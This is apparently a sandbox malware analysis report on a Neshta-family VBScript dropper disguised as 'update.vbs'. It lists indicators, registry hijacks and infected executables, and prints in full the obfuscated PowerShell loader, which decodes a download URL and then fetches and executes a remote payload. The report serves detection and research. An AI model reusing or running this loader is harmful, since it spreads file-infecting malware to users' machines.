neshta | 3a262200a07c9f446ef95a399919a11960671591b90e56312c61b31c2a39dd3a

Analysis

max time kernel
121s
max time network
125s
platform
windows7_x64
resource
win7-20240508-en
resource tags

arch:x64arch:x86image:win7-20240508-enlocale:en-usos:windows7-x64system
submitted
23/05/2024, 16:23

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

update.vbs
Size

72KB
MD5

7bc04c5410cd2c7395ba82859240fea6
SHA1

014f8e77cdedd5141c80a316fc91741efdca8586
SHA256

3a262200a07c9f446ef95a399919a11960671591b90e56312c61b31c2a39dd3a
SHA512

dde32bb051839b4d65edafde2189d56cd39489b70950b0ba6c4eaeb538ddac55201159995b41e9a380326cf4ad8d4703b1d25e169d71e64aab4f4ae5d6fdfb64
SSDEEP

1536:b0eys3Ih0nYdMOuImdjnQKOYVDDoUFYtBQBpPz5lEiFG7A:b0E7Y+OXmJnS2/AXQP1xG7A

Score

10^/10

neshta persistence spyware

Malware Config

Signatures

Neshta
Malware from the neshta family is designed to infect itself into other files to spread itself and cause damage.
persistence spyware neshta

Blocklisted process makes network request 5 IoCs

flow	pid	Process
3	2256	powershell.exe
5	2256	powershell.exe
7	2256	powershell.exe
9	2256	powershell.exe
11	2256	powershell.exe

Loads dropped DLL 1 IoCs

pid	Process
1256	wab.exe

Modifies system executable filetype association 2 TTPs 1 IoCs

persistence

Modify Registry

T1112

Change Default File Association

T1546.001

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\open\command\ = "C:\\Windows\\svchost.com \"%1\" %*"	wab.exe

Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs

pid	Process
1256	wab.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

pid	Process
2756	powershell.exe
1256	wab.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 2756 set thread context of 1256	2756	powershell.exe	34

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File opened for modification	C:\PROGRA~2\INTERN~1\ieinstal.exe	wab.exe
File opened for modification	C:\PROGRA~2\MICROS~1\Office14\WINWORD.EXE	wab.exe
File opened for modification	C:\PROGRA~2\COMMON~1\MICROS~1\OFFICE14\MSOXMLED.EXE	wab.exe
File opened for modification	C:\PROGRA~2\COMMON~1\MICROS~1\OFFICE14\OFFICE~1\ODeploy.exe	wab.exe
File opened for modification	C:\PROGRA~2\Google\Update\1336~1.151\GOOGLE~1.EXE	wab.exe
File opened for modification	C:\PROGRA~2\COMMON~1\MICROS~1\TextConv\WksConv\Wkconv.exe	wab.exe
File opened for modification	C:\PROGRA~2\COMMON~1\MICROS~1\VSTO\10.0\VSTOIN~1.EXE	wab.exe
File opened for modification	C:\PROGRA~2\INTERN~1\ielowutil.exe	wab.exe
File opened for modification	C:\PROGRA~2\MICROS~1\Office14\GROOVEMN.EXE	wab.exe
File opened for modification	C:\PROGRA~2\MICROS~1\Office14\MSTORDB.EXE	wab.exe
File opened for modification	C:\PROGRA~2\WI54FB~1\wmpshare.exe	wab.exe
File opened for modification	C:\PROGRA~2\Google\Update\1336~1.151\GOOGLE~3.EXE	wab.exe
File opened for modification	C:\PROGRA~2\Google\Update\1336~1.151\GOBD5D~1.EXE	wab.exe
File opened for modification	C:\PROGRA~2\MICROS~1\Office14\XLICONS.EXE	wab.exe
File opened for modification	C:\PROGRA~2\WI54FB~1\setup_wm.exe	wab.exe
File opened for modification	C:\PROGRA~2\Adobe\READER~1.0\Resource\Icons\SC_REA~1.EXE	wab.exe
File opened for modification	C:\PROGRA~2\MICROS~1\Office14\ONENOTE.EXE	wab.exe
File opened for modification	C:\PROGRA~2\Adobe\READER~1.0\SETUPF~1\{AC76B~1\Setup.exe	wab.exe
File opened for modification	C:\PROGRA~2\COMMON~1\MICROS~1\ink\mip.exe	wab.exe
File opened for modification	C:\PROGRA~2\MICROS~1\Office14\1033\ONELEV.EXE	wab.exe
File opened for modification	C:\PROGRA~2\MOZILL~1\MAINTE~1.EXE	wab.exe
File opened for modification	C:\PROGRA~2\WINDOW~1\wabmig.exe	wab.exe
File opened for modification	C:\PROGRA~3\PACKAG~1\{33D1F~1\VCREDI~1.EXE	wab.exe
File opened for modification	C:\PROGRA~2\Adobe\READER~1.0\Reader\ACROBR~1.EXE	wab.exe
File opened for modification	C:\PROGRA~2\Adobe\READER~1.0\Reader\AcroRd32.exe	wab.exe
File opened for modification	C:\PROGRA~2\Google\Update\1336~1.151\GOF5E2~1.EXE	wab.exe
File opened for modification	C:\PROGRA~2\MICROS~1\Office14\MSOUC.EXE	wab.exe
File opened for modification	C:\PROGRA~2\MICROS~1\Office14\NAMECO~1.EXE	wab.exe
File opened for modification	C:\PROGRA~2\WINDOW~2\ACCESS~1\wordpad.exe	wab.exe
File opened for modification	C:\PROGRA~2\COMMON~1\MICROS~1\EQUATION\EQNEDT32.EXE	wab.exe
File opened for modification	C:\PROGRA~2\Google\Update\1336~1.151\GOOGLE~4.EXE	wab.exe
File opened for modification	C:\PROGRA~3\PACKAG~1\{4D8DC~1\VC_RED~1.EXE	wab.exe
File opened for modification	C:\PROGRA~2\MICROS~1\Office14\BCSSync.exe	wab.exe
File opened for modification	C:\PROGRA~2\MOZILL~1\UNINST~1.EXE	wab.exe
File opened for modification	C:\PROGRA~2\Google\Update\DISABL~1.EXE	wab.exe
File opened for modification	C:\PROGRA~2\MICROS~1\Office14\INFOPATH.EXE	wab.exe
File opened for modification	C:\PROGRA~2\MICROS~1\Office14\MSQRY32.EXE	wab.exe
File opened for modification	C:\PROGRA~2\MICROS~1\Office14\PPTICO.EXE	wab.exe
File opened for modification	C:\PROGRA~2\COMMON~1\MICROS~1\MSInfo\msinfo32.exe	wab.exe
File opened for modification	C:\PROGRA~2\COMMON~1\MICROS~1\OFFICE14\MSOICONS.EXE	wab.exe
File opened for modification	C:\PROGRA~2\MICROS~1\Office14\GRAPH.EXE	wab.exe
File opened for modification	C:\PROGRA~2\MICROS~1\Office14\SELFCERT.EXE	wab.exe
File opened for modification	C:\PROGRA~2\MICROS~1\Office14\VPREVIEW.EXE	wab.exe
File opened for modification	C:\PROGRA~2\Adobe\READER~1.0\Reader\Eula.exe	wab.exe
File opened for modification	C:\PROGRA~2\COMMON~1\ADOBEA~1\Versions\1.0\ADOBEA~1.EXE	wab.exe
File opened for modification	C:\PROGRA~2\COMMON~1\MICROS~1\OFFICE14\Oarpmany.exe	wab.exe
File opened for modification	C:\PROGRA~2\COMMON~1\MICROS~1\SOURCE~1\OSE.EXE	wab.exe
File opened for modification	C:\PROGRA~2\INTERN~1\iexplore.exe	wab.exe
File opened for modification	C:\PROGRA~2\MICROS~1\Office14\ONENOTEM.EXE	wab.exe
File opened for modification	C:\PROGRA~2\Adobe\READER~1.0\Reader\ADOBEC~1.EXE	wab.exe
File opened for modification	C:\PROGRA~2\Adobe\READER~1.0\Reader\LOGTRA~1.EXE	wab.exe
File opened for modification	C:\PROGRA~2\MICROS~1\Office14\misc.exe	wab.exe
File opened for modification	C:\PROGRA~2\MICROS~1\Office14\MSOSYNC.EXE	wab.exe
File opened for modification	C:\PROGRA~2\MICROS~1\Office14\OIS.EXE	wab.exe
File opened for modification	C:\PROGRA~2\MICROS~1\Office14\POWERPNT.EXE	wab.exe
File opened for modification	C:\PROGRA~2\COMMON~1\MICROS~1\OFFICE14\LICLUA.EXE	wab.exe
File opened for modification	C:\PROGRA~2\Google\Update\1336~1.151\GOOGLE~2.EXE	wab.exe
File opened for modification	C:\PROGRA~2\MICROS~1\Office14\WORDICON.EXE	wab.exe
File opened for modification	C:\PROGRA~2\Adobe\READER~1.0\Reader\A3DUTI~1.EXE	wab.exe
File opened for modification	C:\PROGRA~2\MICROS~1\Office14\IECONT~1.EXE	wab.exe
File opened for modification	C:\PROGRA~2\MICROS~1\Office14\CLVIEW.EXE	wab.exe
File opened for modification	C:\PROGRA~2\MICROS~1\Office14\CNFNOT32.EXE	wab.exe
File opened for modification	C:\PROGRA~2\WI54FB~1\WMPDMC.exe	wab.exe
File opened for modification	C:\PROGRA~2\WI54FB~1\wmplayer.exe	wab.exe

Drops file in Windows directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\svchost.com	wab.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Modifies registry class 1 IoCs

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\open\command\ = "C:\\Windows\\svchost.com \"%1\" %*"	wab.exe

Suspicious behavior: EnumeratesProcesses 3 IoCs

pid	Process
2256	powershell.exe
2756	powershell.exe
2756	powershell.exe

Suspicious behavior: MapViewOfSection 1 IoCs

pid	Process
2756	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	2256	powershell.exe
Token: SeDebugPrivilege	2756	powershell.exe

Suspicious use of WriteProcessMemory 20 IoCs

description	pid	Process	procid_target
PID 2916 wrote to memory of 2256	2916	WScript.exe	28
PID 2916 wrote to memory of 2256	2916	WScript.exe	28
PID 2916 wrote to memory of 2256	2916	WScript.exe	28
PID 2256 wrote to memory of 2856	2256	powershell.exe	30
PID 2256 wrote to memory of 2856	2256	powershell.exe	30
PID 2256 wrote to memory of 2856	2256	powershell.exe	30
PID 2256 wrote to memory of 2756	2256	powershell.exe	32
PID 2256 wrote to memory of 2756	2256	powershell.exe	32
PID 2256 wrote to memory of 2756	2256	powershell.exe	32
PID 2256 wrote to memory of 2756	2256	powershell.exe	32
PID 2756 wrote to memory of 2924	2756	powershell.exe	33
PID 2756 wrote to memory of 2924	2756	powershell.exe	33
PID 2756 wrote to memory of 2924	2756	powershell.exe	33
PID 2756 wrote to memory of 2924	2756	powershell.exe	33
PID 2756 wrote to memory of 1256	2756	powershell.exe	34
PID 2756 wrote to memory of 1256	2756	powershell.exe	34
PID 2756 wrote to memory of 1256	2756	powershell.exe	34
PID 2756 wrote to memory of 1256	2756	powershell.exe	34
PID 2756 wrote to memory of 1256	2756	powershell.exe	34
PID 2756 wrote to memory of 1256	2756	powershell.exe	34

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\update.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:2916
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$verdensfjerneconomatic = 1;$Vastities='Su';$Vastities+='bstrin';$Vastities+='g';Function Concolor($Weaselly){$Genoptagelserne=$Weaselly.Length-$verdensfjerneconomatic;For($verdensfjerne=5;$verdensfjerne -lt $Genoptagelserne;$verdensfjerne+=6){$Tetanuses+=$Weaselly.$Vastities.Invoke( $verdensfjerne, $verdensfjerneconomatic);}$Tetanuses;}function ratlaasene($Kontrasts){& ($Protektionerne) ($Kontrasts);}$Zemas=Concolor 'Ka,riMMisaloFor,azRet.si ,ymplexponlD.scoaForts/Rug,k5cirku.Hyp,t0Stimu Runds( annuWSavori CardnReguld reecoHvi.ewAntissPrea so,mNKd,onTProdu non,l1Autoe0Kamer.I.otr0Trans;rejse Inn.WPres.iB,kenn Trkn6Stift4Super; ef e Hi,loxUdst 6Rygel4Quidd;Termo PensrProtevSiali: Semi1 Over2Marsi1Tmrer.Konto0 aria),msae jeerGSolodeKunstcfaberk frakoHypos/ lowp2Tridk0bogca1Vas,e0Damas0 ervi1Finge0Diphe1Stage K mplFMann iSwashr G,ute,udsjfCanceoFrustxsmin /Premi1Bered2Porce1 Xeno.voxe,0Antip ';$Egenartets=Concolor 'BathmU MorgsetuieeMarksrDepic-HaanlASagtmgAthaleSplitnFore,t Ther ';$Bogbinderi=Concolor '.engehpolyttTangltOv rapBridgs Tact:Grund/Optog/Snkniw,rickwAftrywDevot.SregnsP rsoeLnmo,n Sandd .ymmsD flopDysuraDaarlcVandfeImipr.Bottlc Af,eo N mamAntid/ b.skpPokinr .nsooYvonn/Exs.fd ,niflprste/Monop7 ightdVulcahAcantiSkannd .mmu7Spawn ';$Prakriti=Concolor 'Fangs>Neigh ';$Protektionerne=Concolor 'damesiGr.fie homoxM,til ';$Dournesses='Forureningskildens';ratlaasene (Concolor 'NatioSNyt ieSammetpea.a-Bedl,CNont o FrognanskatLivreeAssonn F.lkt Thic D sse-DerriPEdifiaOrgantProvih .jen Per.eTDisse: Tykn\BetonDSk.kkiOverimSti,lyUrban.LakfatFi,kexvr,retBygrn Skave-grassVFejlfaDiplol San u B egeJosfl Bombe$Lab.aDNoncooWooleu GemarUdso.nEnerge Ap.ssFlosssPreh,e KommsApoko; ,top ');ratlaasene (Concolor 'Mout.i DambfLor.e Wiver(AdscitTrocte Foras leoptAl al- LeiopPlastaOverftRetarh Tour BugseTSulai: tran\W,sseDAppleiShab,mTil.sySmnde.UnadutRligsx Ekstt trep)Marke{WhiteeD.bstxPosthioplbetBes,a}.onre;Overs ');$Unensouled = Concolor 'Tu,lieFrknec PalmhBla,koLa el .erde% hantaOraklpGodtepFrancdVarmeamaggitUntemaBedri%Beslu\UnderAMucoscFlskeeRatiot Ungry Kakol DeramOverteBourotpa,eih SognyGrisslTilbycKnl.daMe.virForh bF.riniWal,inForuroMisi.lRdstj. ,urrRUsseloSkndinRende D,mit& Ossa& flam LyskoeVul,scGdninh AcetoEnerg skr.p$Stade ';ratlaasene (Concolor 'Gr nd$ Ind,g.dhullVoda.oDespob freda Pte,lHedg,:W.llsPSp bra Reg,g Kab,aU,sidn DeciiHologsY,lloh,ende7Misco3Apo.i=Aya o(B.slac CrakmtvistdCh,rd Cubby/honeyconsla Auric$ C.raUSluednHexaceDesinnMe,dosAnenco Du.auMan.ali,trae Rentd Kuve)Flere ');ratlaasene (Concolor ' Ggep$O tspgGunmal Po toChamob Ts.racan,llParad:OperaJWasteuOmstyb SteriHavgalStrikaNo petDeodoo Ef.erForpoyPaabu= Obse$V.agmBDiploo Op ygmed,tbHazariA,arynToecadEks.ee ,lepr hjskiSuper.CatapsTunenpTe.nglUnbeliSerpet.erip(,mora$ PremPDeuterSkruma Ads,kAk,ierRgskyiOverdt Be.aiPrebr)Svovl ');$Bogbinderi=$Jubilatory[0];ratlaasene (Concolor 'Te ef$UnbesgPartilO ermoAlt rbP.incaPerlul Anti:terneUSa,knnDemi,dO sehe Fermr G nogBegrdr phenuSysken HvepdNine.sEfterhkontorCotypeKlampsjubel=.urerNhexoyeNonpow Feha-OvervOBotchbReseaj ,romeForfecC ouptEfter .ippoSS,ejeyVrdigsOdonttTusineUnambm Arb .TilisNElapie.ensttRusso.varskW.aeone,weakbKnhjeCColorlUnfibi DeraeFllesnFisketNumer ');ratlaasene (Concolor 'M.lle$U,domUOpslanVeer,dMillieH.ster Parag ReporlnpoluAnnulnBogsidGirlesPanteh AkvarKappeeraylisGhane. HabiHluckneArisia RapfdSpanseInfelrT,klosTeleo[Ajlef$Si,tpEUdtogg SpinePerianSensoa bandrCofint ulvseGesantBo.casTagli]Ekste=Vinpl$ for.ZSpgefeProb,mcreamaRepa s Klo, ');$Healthiness=Concolor 'NaaleUOmstdn Osted Mi le NedkrHyp,kgForurr Hondu dvksnTembedMonoksLocalhotte r RefoePr.sts F.sk.R.ptuDRe.mbo C,utwUho,onSymbolVerdeo iegaPolead ChreFovenei.omanlOogoneVendi(Phre.$ DespBBitbloc remgI,degbMode iChi,nn Dir,dHypereReallrPerici Ampu,Situ.$SkotsB Civio.jernu ConfgBermmaFrockiGyritn Su,dv Undei Po tlTaintlRethaeMedioaGlbche TrusrSupernFourpeMecha)Frica ';$Healthiness=$Paganish73[1]+$Healthiness;$Bougainvilleaerne=$Paganish73[0];ratlaasene (Concolor 'I ter$Dy,bug,oogolMyxocoCy.nkbFavoraPurdalGunna:Al.ueSCurvenSjokkuTerm rDesulpMuta eBiltynPrefaoKrimit B nde WindrOverts Daad=Rygdk( TartTLaveeeTingss Spi.t Melt-P.ogrPDeempaAd ptt isfuhPeace untur$CrossBTopiaoStam.u Ad.ig MulmaAudioi RegenBanffvE,nyfiTids lFor elPredueSai.taRefereUrocyrForebnpraese edst) Loss ');while (!$Snurpenoters) {ratlaasene (Concolor 'astig$ Diskg N,nmlhymenoJuri b Hydra SwimlSubso: P,riEDyrtikBecalsoply,aAandsm DeteeRammenEnsilsUforeoUmaa rSrkerd Tu nndan kiSchepn.onorgHj,taeKulturVisuasPrinc= N,bi$AnalstU.smyrKasteuEkphoeKruse ') ;ratlaasene $Healthiness;ratlaasene (Concolor 'Pa laSMa edtVentiaVildsrStyrkt Circ- gyptSFynsklUncateAtel,e Res,pCrev. Dia.4Fj rb ');ratlaasene (Concolor ' ,amm$ HydrgMglinlBrilloPlanebJacobaReocclpen.e: NighSGra,snO aliuTrosbrMinidpPredeeFolkenk,udeoCo,not RelieamtsprH,lias Omb =Kante(CirkuTJhooleBrasqsNyvlgtBonde-allaeP kelta H,det ClimhLegis Trol$ ForbBHeathoBrutuuPavagg elvhaInteriSue fn Bon vDobb iPhyselH.perlConiaeLandfaUnaideMaa erUddatnMantbeServo)Afsva ') ;ratlaasene (Concolor ' onol$Snobbg GanslUnexpoModulbStretaVenchlMeldi:ObeliBOrdinrS,kunuEyrfig lokseNon.orFl veeCobblr Betrf NoreaHennarPortii,aglinDiskegEnsfoe Gr,tr Rhil=Defib$BacksgMundgl outioDam,bbTelefaBrainlSemis:Fy reHHjemloBuni.r Huggtvaishe VolknPre e+Infol+ Rout% Serv$GuiltJTri.euMiljpb Grouip,psilGangbaFjlentUdlbsoPennyrameriyUnr,p.SemihcEneb,odeva.u AdrenPlanetStucc ') ;$Bogbinderi=$Jubilatory[$Brugererfaringer];}$Swimsuit=280753;$Differentialforstrker=28374;ratlaasene (Concolor 'Gamb $Gu sbgbl,dml rugeo P oebGramma To mlBridg: Ov rSDaavitSkildoInforrAdvokmChalkfV.gnmu Fr.olCaterdM,xtueInlea lod=,nter StrikGVurdeeUnsertQ,int-BicreC frilore.elnKipfetSandaePe,rinSto mtRekr, Antig$ ChroB KantoTaphruFo fjg Supea,olysi GharnFllesvIcticiKanonl Bl.sl F rue,osenaPundieHaar.rBagsln P,eaeBrndg ');ratlaasene (Concolor ' ,gri$ NeurgComicl DispoHardfbEnkeraCamoulCelib: CheeSBoudeh ,ensaSolutnBrankt SyssuMundsnC trugLuxur Eueme=Riv,r P,rma[L aveSRev,lySter,sSchiztHj,ste Tambm Enk.. ,pgeCCalyco ppelnStdtevUnsloeBi,anrRac,dt Nive]Semmy:Verts:IndhsFMou,nrUnsooo .rmlmCtrlbBSve,sa IrrisS tteeT,etu6Natte4LakfeSguvactIndrerSaloniHypotnChampgEpony( orge$kopieS ngratProt.o Resur BrndmLirasf Yaplu agrelMi.cldCr,wbeCh ri) Ensp ');ratlaasene (Concolor ' ,ver$Subchg Ja,blBioreoAm.dob Tekia P ell ,ils: pksSWi,dokEringoLop,or,ewrapSkabeeDd,stdFabrieR fugs C ar .mphi= pro. sight[ DesiSPanteyOver,s KoektZanziesvovlmBowdl.Sk.llT slasePo sexUdkobtbarmh.,edbrEStddmn folkcAfsttofiskedBindiiEld,rnOgre gScaff]Ponde:Aftal:G,aehATrochSElek CBerolIW,ittIKldni.QuestG P.yteFarvetBje.gSS miht hilrNonsuiBo.arnHospigFrave(Vir.u$ UbetSR,conhR tteaFr msnScoottAppe.u ryptnrequeg He,a)B,sla ');ratlaasene (Concolor 'Kamph$ ind.gOrganlbib loHip,ib couta Kamflemmer:Hir,nL,angvoDe,pekVestua.ntrulSkonsiPleursAnklaeBrne,r PartiBorn n MontgSemim= .egi$KilopSBaglikLumutoTrosfr P etpPaahnePubisd ResteApplisMarty.Ani.as.xcuruGnar,b Texss se,vt,jaktrOutthiReisan.hegegCe la( arad$StagnSAdornwsun,iiFi,zcm M,sksNevusuForumiSpredt cre,dragl$proteDOceani llesftick.fViatoeTrrehrDampbenebulnBestrtTerciiK lopaAvnerlBrystfb drvo V lurColacsF aeltB aavr Len.kBronkeSpirorSuper)Herre ');ratlaasene $Lokalisering;"
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2256
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Acetylmethylcarbinol.Ron && echo $"
    3⤵
    PID:2856
- - C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$verdensfjerneconomatic = 1;$Vastities='Su';$Vastities+='bstrin';$Vastities+='g';Function Concolor($Weaselly){$Genoptagelserne=$Weaselly.Length-$verdensfjerneconomatic;For($verdensfjerne=5;$verdensfjerne -lt $Genoptagelserne;$verdensfjerne+=6){$Tetanuses+=$Weaselly.$Vastities.Invoke( $verdensfjerne, $verdensfjerneconomatic);}$Tetanuses;}function ratlaasene($Kontrasts){& ($Protektionerne) ($Kontrasts);}$Zemas=Concolor 'Ka,riMMisaloFor,azRet.si ,ymplexponlD.scoaForts/Rug,k5cirku.Hyp,t0Stimu Runds( annuWSavori CardnReguld reecoHvi.ewAntissPrea so,mNKd,onTProdu non,l1Autoe0Kamer.I.otr0Trans;rejse Inn.WPres.iB,kenn Trkn6Stift4Super; ef e Hi,loxUdst 6Rygel4Quidd;Termo PensrProtevSiali: Semi1 Over2Marsi1Tmrer.Konto0 aria),msae jeerGSolodeKunstcfaberk frakoHypos/ lowp2Tridk0bogca1Vas,e0Damas0 ervi1Finge0Diphe1Stage K mplFMann iSwashr G,ute,udsjfCanceoFrustxsmin /Premi1Bered2Porce1 Xeno.voxe,0Antip ';$Egenartets=Concolor 'BathmU MorgsetuieeMarksrDepic-HaanlASagtmgAthaleSplitnFore,t Ther ';$Bogbinderi=Concolor '.engehpolyttTangltOv rapBridgs Tact:Grund/Optog/Snkniw,rickwAftrywDevot.SregnsP rsoeLnmo,n Sandd .ymmsD flopDysuraDaarlcVandfeImipr.Bottlc Af,eo N mamAntid/ b.skpPokinr .nsooYvonn/Exs.fd ,niflprste/Monop7 ightdVulcahAcantiSkannd .mmu7Spawn ';$Prakriti=Concolor 'Fangs>Neigh ';$Protektionerne=Concolor 'damesiGr.fie homoxM,til ';$Dournesses='Forureningskildens';ratlaasene (Concolor 'NatioSNyt ieSammetpea.a-Bedl,CNont o FrognanskatLivreeAssonn F.lkt Thic D sse-DerriPEdifiaOrgantProvih .jen Per.eTDisse: Tykn\BetonDSk.kkiOverimSti,lyUrban.LakfatFi,kexvr,retBygrn Skave-grassVFejlfaDiplol San u B egeJosfl Bombe$Lab.aDNoncooWooleu GemarUdso.nEnerge Ap.ssFlosssPreh,e KommsApoko; ,top ');ratlaasene (Concolor 'Mout.i DambfLor.e Wiver(AdscitTrocte Foras leoptAl al- LeiopPlastaOverftRetarh Tour BugseTSulai: tran\W,sseDAppleiShab,mTil.sySmnde.UnadutRligsx Ekstt trep)Marke{WhiteeD.bstxPosthioplbetBes,a}.onre;Overs ');$Unensouled = Concolor 'Tu,lieFrknec PalmhBla,koLa el .erde% hantaOraklpGodtepFrancdVarmeamaggitUntemaBedri%Beslu\UnderAMucoscFlskeeRatiot Ungry Kakol DeramOverteBourotpa,eih SognyGrisslTilbycKnl.daMe.virForh bF.riniWal,inForuroMisi.lRdstj. ,urrRUsseloSkndinRende D,mit& Ossa& flam LyskoeVul,scGdninh AcetoEnerg skr.p$Stade ';ratlaasene (Concolor 'Gr nd$ Ind,g.dhullVoda.oDespob freda Pte,lHedg,:W.llsPSp bra Reg,g Kab,aU,sidn DeciiHologsY,lloh,ende7Misco3Apo.i=Aya o(B.slac CrakmtvistdCh,rd Cubby/honeyconsla Auric$ C.raUSluednHexaceDesinnMe,dosAnenco Du.auMan.ali,trae Rentd Kuve)Flere ');ratlaasene (Concolor ' Ggep$O tspgGunmal Po toChamob Ts.racan,llParad:OperaJWasteuOmstyb SteriHavgalStrikaNo petDeodoo Ef.erForpoyPaabu= Obse$V.agmBDiploo Op ygmed,tbHazariA,arynToecadEks.ee ,lepr hjskiSuper.CatapsTunenpTe.nglUnbeliSerpet.erip(,mora$ PremPDeuterSkruma Ads,kAk,ierRgskyiOverdt Be.aiPrebr)Svovl ');$Bogbinderi=$Jubilatory[0];ratlaasene (Concolor 'Te ef$UnbesgPartilO ermoAlt rbP.incaPerlul Anti:terneUSa,knnDemi,dO sehe Fermr G nogBegrdr phenuSysken HvepdNine.sEfterhkontorCotypeKlampsjubel=.urerNhexoyeNonpow Feha-OvervOBotchbReseaj ,romeForfecC ouptEfter .ippoSS,ejeyVrdigsOdonttTusineUnambm Arb .TilisNElapie.ensttRusso.varskW.aeone,weakbKnhjeCColorlUnfibi DeraeFllesnFisketNumer ');ratlaasene (Concolor 'M.lle$U,domUOpslanVeer,dMillieH.ster Parag ReporlnpoluAnnulnBogsidGirlesPanteh AkvarKappeeraylisGhane. HabiHluckneArisia RapfdSpanseInfelrT,klosTeleo[Ajlef$Si,tpEUdtogg SpinePerianSensoa bandrCofint ulvseGesantBo.casTagli]Ekste=Vinpl$ for.ZSpgefeProb,mcreamaRepa s Klo, ');$Healthiness=Concolor 'NaaleUOmstdn Osted Mi le NedkrHyp,kgForurr Hondu dvksnTembedMonoksLocalhotte r RefoePr.sts F.sk.R.ptuDRe.mbo C,utwUho,onSymbolVerdeo iegaPolead ChreFovenei.omanlOogoneVendi(Phre.$ DespBBitbloc remgI,degbMode iChi,nn Dir,dHypereReallrPerici Ampu,Situ.$SkotsB Civio.jernu ConfgBermmaFrockiGyritn Su,dv Undei Po tlTaintlRethaeMedioaGlbche TrusrSupernFourpeMecha)Frica ';$Healthiness=$Paganish73[1]+$Healthiness;$Bougainvilleaerne=$Paganish73[0];ratlaasene (Concolor 'I ter$Dy,bug,oogolMyxocoCy.nkbFavoraPurdalGunna:Al.ueSCurvenSjokkuTerm rDesulpMuta eBiltynPrefaoKrimit B nde WindrOverts Daad=Rygdk( TartTLaveeeTingss Spi.t Melt-P.ogrPDeempaAd ptt isfuhPeace untur$CrossBTopiaoStam.u Ad.ig MulmaAudioi RegenBanffvE,nyfiTids lFor elPredueSai.taRefereUrocyrForebnpraese edst) Loss ');while (!$Snurpenoters) {ratlaasene (Concolor 'astig$ Diskg N,nmlhymenoJuri b Hydra SwimlSubso: P,riEDyrtikBecalsoply,aAandsm DeteeRammenEnsilsUforeoUmaa rSrkerd Tu nndan kiSchepn.onorgHj,taeKulturVisuasPrinc= N,bi$AnalstU.smyrKasteuEkphoeKruse ') ;ratlaasene $Healthiness;ratlaasene (Concolor 'Pa laSMa edtVentiaVildsrStyrkt Circ- gyptSFynsklUncateAtel,e Res,pCrev. Dia.4Fj rb ');ratlaasene (Concolor ' ,amm$ HydrgMglinlBrilloPlanebJacobaReocclpen.e: NighSGra,snO aliuTrosbrMinidpPredeeFolkenk,udeoCo,not RelieamtsprH,lias Omb =Kante(CirkuTJhooleBrasqsNyvlgtBonde-allaeP kelta H,det ClimhLegis Trol$ ForbBHeathoBrutuuPavagg elvhaInteriSue fn Bon vDobb iPhyselH.perlConiaeLandfaUnaideMaa erUddatnMantbeServo)Afsva ') ;ratlaasene (Concolor ' onol$Snobbg GanslUnexpoModulbStretaVenchlMeldi:ObeliBOrdinrS,kunuEyrfig lokseNon.orFl veeCobblr Betrf NoreaHennarPortii,aglinDiskegEnsfoe Gr,tr Rhil=Defib$BacksgMundgl outioDam,bbTelefaBrainlSemis:Fy reHHjemloBuni.r Huggtvaishe VolknPre e+Infol+ Rout% Serv$GuiltJTri.euMiljpb Grouip,psilGangbaFjlentUdlbsoPennyrameriyUnr,p.SemihcEneb,odeva.u AdrenPlanetStucc ') ;$Bogbinderi=$Jubilatory[$Brugererfaringer];}$Swimsuit=280753;$Differentialforstrker=28374;ratlaasene (Concolor 'Gamb $Gu sbgbl,dml rugeo P oebGramma To mlBridg: Ov rSDaavitSkildoInforrAdvokmChalkfV.gnmu Fr.olCaterdM,xtueInlea lod=,nter StrikGVurdeeUnsertQ,int-BicreC frilore.elnKipfetSandaePe,rinSto mtRekr, Antig$ ChroB KantoTaphruFo fjg Supea,olysi GharnFllesvIcticiKanonl Bl.sl F rue,osenaPundieHaar.rBagsln P,eaeBrndg ');ratlaasene (Concolor ' ,gri$ NeurgComicl DispoHardfbEnkeraCamoulCelib: CheeSBoudeh ,ensaSolutnBrankt SyssuMundsnC trugLuxur Eueme=Riv,r P,rma[L aveSRev,lySter,sSchiztHj,ste Tambm Enk.. ,pgeCCalyco ppelnStdtevUnsloeBi,anrRac,dt Nive]Semmy:Verts:IndhsFMou,nrUnsooo .rmlmCtrlbBSve,sa IrrisS tteeT,etu6Natte4LakfeSguvactIndrerSaloniHypotnChampgEpony( orge$kopieS ngratProt.o Resur BrndmLirasf Yaplu agrelMi.cldCr,wbeCh ri) Ensp ');ratlaasene (Concolor ' ,ver$Subchg Ja,blBioreoAm.dob Tekia P ell ,ils: pksSWi,dokEringoLop,or,ewrapSkabeeDd,stdFabrieR fugs C ar .mphi= pro. sight[ DesiSPanteyOver,s KoektZanziesvovlmBowdl.Sk.llT slasePo sexUdkobtbarmh.,edbrEStddmn folkcAfsttofiskedBindiiEld,rnOgre gScaff]Ponde:Aftal:G,aehATrochSElek CBerolIW,ittIKldni.QuestG P.yteFarvetBje.gSS miht hilrNonsuiBo.arnHospigFrave(Vir.u$ UbetSR,conhR tteaFr msnScoottAppe.u ryptnrequeg He,a)B,sla ');ratlaasene (Concolor 'Kamph$ ind.gOrganlbib loHip,ib couta Kamflemmer:Hir,nL,angvoDe,pekVestua.ntrulSkonsiPleursAnklaeBrne,r PartiBorn n MontgSemim= 